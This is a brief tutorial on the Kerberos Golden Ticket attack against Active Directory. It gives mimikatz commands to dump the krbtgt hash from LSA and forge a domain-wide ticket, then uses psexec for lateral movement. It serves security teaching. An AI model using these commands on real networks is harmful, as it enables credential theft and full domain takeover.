Golden Ticket

In one of the previous methods we found a way to get the password to an SPN and use it to create a TGS to gain access to the resources available to that SPN. This is great, but what if we can make TGTs? Then we can grant ourselves infinite access across the entire domain.

The TGT is issued by the domain controller and that is controlled by a domain user account called krbtgt. If we can get the password to this account, then we can use it to create any TGT that we want.

In order to achieve this we need to secure one of the two - have access to an account that is part of the group "Domain Admins Group" or compromise the domain controller.

We will use mimikatz to create the Golden ticket using the following commands,

privilege::debug
lsadump::lsa /patch

If you have the right access or compromised the domain controller, you should see the krbtgt account listed. We can use the hash of the account in the command mentioned below to create the golden ticket,

kerberos::golden /user:userx /domain:p42.com /sid:S-1-5-21-1602875587-2794529311-2849289388 /krbtgt:75b60230423924812011dbfaf3413565 /ptt
misc::cmd

Next we can use the psexec command to move laterally to any maching within the domain,

psexec.exe \\particle01 cmd.exe